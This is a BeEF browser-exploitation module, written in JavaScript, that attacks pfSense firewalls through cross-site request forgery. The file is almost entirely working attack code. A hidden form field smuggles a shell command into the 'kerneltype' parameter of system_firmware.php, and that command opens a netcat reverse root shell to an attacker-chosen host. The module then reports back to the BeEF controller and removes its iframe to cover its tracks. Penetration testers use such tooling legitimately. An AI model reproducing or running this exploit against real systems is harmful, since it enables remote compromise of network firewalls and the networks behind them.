Path: blob/master/modules/exploits/pfsense/pfsense_reverse_root_shell_csrf/command.js
1872 views
//1// Copyright (c) 2006-2026Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {7var rhost = '<%= @rhost %>';8var rport = '<%= @rport %>';9var lhost = '<%= @lhost %>';10var lport = '<%= @lport %>';1112var pfsense_iframe = beef.dom.createIframeXsrfForm("https://" + rhost + ":" + rport +"/system_firmware.php", "POST", "application/x-www-form-urlencoded",13[{'type':'hidden', 'name':'kerneltype', 'value':'SMP > /boot/kernel/pfsense_kernel.txt;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ' + lhost + ' ' + lport + ' >/tmp/f &'}]);1415beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");1617cleanup = function() {18document.body.removeChild(pfsense_iframe);19}20setTimeout("cleanup()", 15000);2122});23242526